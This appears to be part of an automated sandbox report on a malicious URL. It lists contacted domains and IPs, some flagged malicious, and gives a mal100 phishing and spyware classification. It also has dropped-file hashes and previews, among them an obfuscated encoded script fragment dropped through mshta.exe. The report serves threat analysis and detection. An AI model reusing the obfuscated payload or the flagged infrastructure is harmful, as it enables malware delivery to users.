            		35.190.80.1
            		truefalse
              		high
              veilyspen.shop
              		172.67.216.225
              		truefalse
                		unknown
                cdnjs.cloudflare.com
                		104.17.24.14
                		truefalse
                  		high
                  s-part-t-9999.t-msedge.net
                  		13.107.246.254
                  		truefalse
                    		unknown
                    www.google.com
                    		142.250.185.132
                    		truefalse
                      		high
                      arm-9999.arm-msedge.net
                      		4.150.240.254
                      		truefalse
                        		unknown
                        agiledeals.shop
                        		172.67.151.250
                        		truetrue
                          		unknown
                          wac-9999.wac-msedge.net
                          		52.108.8.254
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://escooterzone.com/play.htmltrue
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              104.17.24.14
                              		cdnjs.cloudflare.comUnited States
                              		13335CLOUDFLARENETUSfalse
                              216.58.212.131
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              172.217.18.3
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              142.250.185.132
                              		www.google.comUnited States
                              		15169GOOGLEUSfalse
                              172.67.194.161
                              		e1.foiloverturnarrival.shopUnited States
                              		13335CLOUDFLARENETUStrue
                              64.233.167.84
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              239.255.255.250
                              		unknownReserved
                              		unknownunknownfalse
                              188.114.97.3
                              		escooterzone.comEuropean Union
                              		13335CLOUDFLARENETUStrue
                              142.250.185.163
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              142.250.185.131
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              172.67.151.250
                              		agiledeals.shopUnited States
                              		13335CLOUDFLARENETUStrue
                              142.250.186.142
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              35.190.80.1
                              		a.nel.cloudflare.comUnited States
                              		15169GOOGLEUSfalse
                              2.23.242.162
                              		unknownEuropean Union
                              		8781QA-ISPQAfalse
                              172.217.18.110
                              		unknownUnited States
                              		15169GOOGLEUSfalse
                              172.67.216.225
                              		veilyspen.shopUnited States
                              		13335CLOUDFLARENETUSfalse

                              Private

                              IP
                              192.168.2.17
                              127.0.0.1

                              General Information

                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1592165
                              Start date and time:2025-01-15 21:03:19 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Sample URL:https://escooterzone.com/play.html
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:25
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.spyw.evad.win@26/11@12/207

                              Warnings

                              • Exclude process from analysis (whitelisted): TextInputHost.exe
                              • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.142, 64.233.167.84, 172.217.23.110, 142.250.185.78, 142.250.185.131, 172.217.18.3, 172.217.18.14
                              • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtEnumerateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: https://escooterzone.com/play.html

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0x9a09c10d, page size 16384, DirtyShutdown, Windows version 10.0
                              Category:dropped
                              Size (bytes):1310720
                              Entropy (8bit):0.5145019055122076
                              Encrypted:false
                              SSDEEP:
                              MD5:1698A3E94F61FE98247B68A88332F240
                              SHA1:DD223D02130E6CB945253843CC5A346D2D490146
                              SHA-256:BF2C2F7D7FC5A94C0DA1ECD52C2CD48F26EB53C7A27713E8A9665B38EE070C80
                              SHA-512:43C77A1B0E0DC3FA96D0906B10C8A09BFA8099D2B988E87C8DAA6E318488B042BB8668E270603FF9DB3E266466B5866C074FF3AAACE4908CBFFE1A98881B2DF7
                              Malicious:false
                              Reputation:unknown
                              Preview:....... ...............X\...;...{......................0.9..........{.......}..h.;.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ....... /...{...............................................................................................................................................................................................2...{.................................."..T.....}.B.........................}...........................#......h.;.....................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\GO30WR0E\s6[1].pdf

                              Download File
                              Process:C:\Windows\System32\mshta.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):667975
                              Entropy (8bit):5.153206126538673
                              Encrypted:false
                              SSDEEP:
                              MD5:F7F32429C8AD0C5EC86D4DD3C63FD434
                              SHA1:6B2CFD4AC479E6D70965D5A871312AE629822800
                              SHA-256:A31C6619EAB4B632343BA1DE1A3F27073F602A184749C8219A4E16FC9A94EE90
                              SHA-512:7F5D60CCBFBD0E46A9305EE9AFB6EE82C83A33CE3F909D3269DDA24B361D614975650C5197394302B8218AC0B65C6DBADF4BB1AEFB16B0A17FF003A741E20ECE
                              Malicious:false
                              Reputation:unknown
                              Preview:66u75z6ef63b74f69f6ff6eT20j51u53s69R79I48G78C28n46L6cE73f58K6eF6eb29A7bY76i61e72V20c53e49Y50B42a57p6fc3dN20Q27V27v3bJ66b6fB72K20v28p76M61T72k20R48l67A65x65s6aC20x3dl20T30z3bH48s67A65K65C6ap20K3cs20S46c6cf73s58m6eR6eQ2ev6cD65J6eu67g74K68L3bP20u48E67q65d65a6aI2bY2bs29q7bu76Q61O72D20I4aR78y68U48k71w20u3dq20E53Y74z72j69h6ex67y2en66r72n6fo6dw43d68G61G72M43M6fj64k65u28k46p6cy73V58C6eN6em5bm48L67Z65v65N6aQ5dY20p2dg20r33u31t33K29Z3bE53z49H50b42S57Z6fC20K3dl20I53B49M50A42F57P6fZ20e2bg20U4aL78L68b48R71r7db72f65E74Q75a72V6eR20q53Z49U50g42p57q6ft7dj3bn76j61c72a20Q53u49A50P42S57a6fG20M3dN20Y51z53O69d79h48Q78A28m5bU34l32k35Q2cr34L32m34g2cZ34Z33j32k2cw34h31b34j2cB34A32x37a2cQ34m32q38T2cI34D31R37a2cG34D31I34a2cs34w32S31y2cr34J32Z31j2cN33i35s39B2cW34c31R34r2cX34e33b33g2cS34a31W34i2cv33Q34H35n2ct33M35a38W2cR34J33s32z2cO33d34r35r2cb33O36M32h2ct33p34w35g2cm33Z35D38b2cb33b38H32S2ca34j32C33a2cB34m31p32B2cI33V34k35N2cj33R38c37u2cm33j37F38E2cN33o37o39G2cT34b33A30U2cJ33y37v38p2cC33Z38Z32f2ca33Q36q31p2cZ33K37Z3

                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):16336
                              Entropy (8bit):5.462734784188222
                              Encrypted:false
                              SSDEEP:
                              MD5:AFFC8500B47EEF934CF47F381A678269
                              SHA1:97B124A8F821C8855FF8D609EE19A4C549E0DC04
                              SHA-256:32E9CED972A3E062B6D2CA9B62B6B79E17B5C7175FE8CC45257F55F505F0FB70
                              SHA-512:73F4DD825CA7D6812D5E770DE4A5EEF832618AB1E2377BE4044713466CC9CB01FF005643D2E6C901592D0FDEB4893CB8CB70E5F1076105BB81A5534F3B34D78E
                              Malicious:false
                              Reputation:unknown
                              Preview:@...e................................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....^.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eieldnfk.kk3.ps1

                              Download File
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Reputation:unknown
                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 19:03:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2677
                              Entropy (8bit):3.991352545884244
                              Encrypted:false
                              SSDEEP:
                              MD5:C77B8BD8FD81721EA37B7C9B192CB818
                              SHA1:A4B527ACADE19A5B5A018EA3E2E4D5E948FABA37
                              SHA-256:11D04C07C491F67D1AE605EA28C58EB74C68BA308127765738179696CF11DDA8
                              SHA-512:7DB9047AC03C78B90542F1B643ECC9A8157EFDDD4CC54FA46609C6F64474D63E91CBF35D6497FFEBDDBCF09C4E33A2969EB499B0E0CF42E4444037ECA0C1523D
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....SMV..g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zz............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 19:03:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2679
                              Entropy (8bit):4.009929761710726
                              Encrypted:false
                              SSDEEP:
                              MD5:D94FD2C570653FE7E203EB1C62136200
                              SHA1:F4167098290DD68C937823F155A84B2C92EA02DF
                              SHA-256:41031A0BBB3DE39F02D16500EA9E84A28C73155135F205D42F148C2385E11FA0
                              SHA-512:4FE709562217FA5C7474AD5656C62AD7CDFF2120E1C3F40F1041D5A068952D72BF607EAC3B39C9E06F6C922A726FDF9E979C89B8184E8E4046E67697D85A3CEC
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,......E..g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zz............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2693
                              Entropy (8bit):4.017332885158964
                              Encrypted:false
                              SSDEEP:
                              MD5:37F8A5FB48B86F2D67299CD29046ADEF
                              SHA1:0A72BD943CCFF46EAA6E91EA06A8A16FF690668C
                              SHA-256:B9279F65D0E4E819CA7AD799803D33E533BBB7D6098091B626525E676492CB4F
                              SHA-512:3AD45816BF10FF79DAEA55F3AB416E339B5FCD454EB14EEF91AF303D382C6C2B169EBFDAAA0292FD55452A5D735C0D0F99C56A546532E1317A63BA9A66DE84C4
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 19:03:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):4.009205821798188
                              Encrypted:false
                              SSDEEP:
                              MD5:C9E843B8B0720EC30E3D1B8FBC22954D
                              SHA1:D57BA531392EAD552D2DA1D7F155304E6009C277
                              SHA-256:FABE3FB18F3DC7C8F609F0CA536ACB23880CAAA6B2B9D4B89040CDC02523F1B6
                              SHA-512:A3AEC77D0FBAC3054ED526EA93B08369BDA7361608C7AFA9668C1312CEE2959314857E13C9F089DD33643790BA80ED094636901E768E6551A2376A68CCCB2B43
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,......<..g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zz............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 19:03:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2681
                              Entropy (8bit):3.9960433481139765
                              Encrypted:false
                              SSDEEP:
                              MD5:F8DDEE80579B63582FFA3351786D2AC8
                              SHA1:083DA2F91D68E5D50D7059E978855A05CE0D6955
                              SHA-256:01CFA47503D86EC2F77AC04E9E3336654BF34540182E530E901955E7EC2D4097
                              SHA-512:3049753997C221CDD43ED0CCDCCEF1D29A78828EB8C7D803A2D3E1A2FC1198146C42B53190499E21CCDBA77473DD71ABA1E1CC862565542C78CBA10D0F6394D4
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,......M..g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zz............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                              Download File
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 15 19:03:50 2025, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                              Category:dropped
                              Size (bytes):2683
                              Entropy (8bit):4.008771936495139
                              Encrypted:false
                              SSDEEP:
                              MD5:5B4139E60804F4FCCD12DB461C19C27C
                              SHA1:2BDDEED306E5BAF13D311CF5CACC4FC3398211CE
                              SHA-256:AB51A4E768397A89A5FAFBAE11639A7FAE5824B600A3801AB5D62CFC2560DC74
                              SHA-512:60CFE020761C58DB307B52162DA58FAF699346B922F3B7422FA7378A7E1B07B8865B52BD052CAAD7C52C184863C475F8F4046649EB91DB3D3BD058340032D34C
                              Malicious:false
                              Reputation:unknown
                              Preview:L..................F.@.. ...$+.,....Q.,..g......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I/Zq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V/Zx.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V/Zx.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V/Zx............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V/Zz............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........D..|.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                              C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                              Download File
                              Process:C:\Windows\System32\svchost.exe
                              File Type:Unknown
                              Category:dropped
                              Size (bytes):55
                              Entropy (8bit):4.306461250274409
                              Encrypted:false
                              SSDEEP:
                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                              Malicious:false
                              Reputation:unknown
                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                              Static File Info

                              No static file info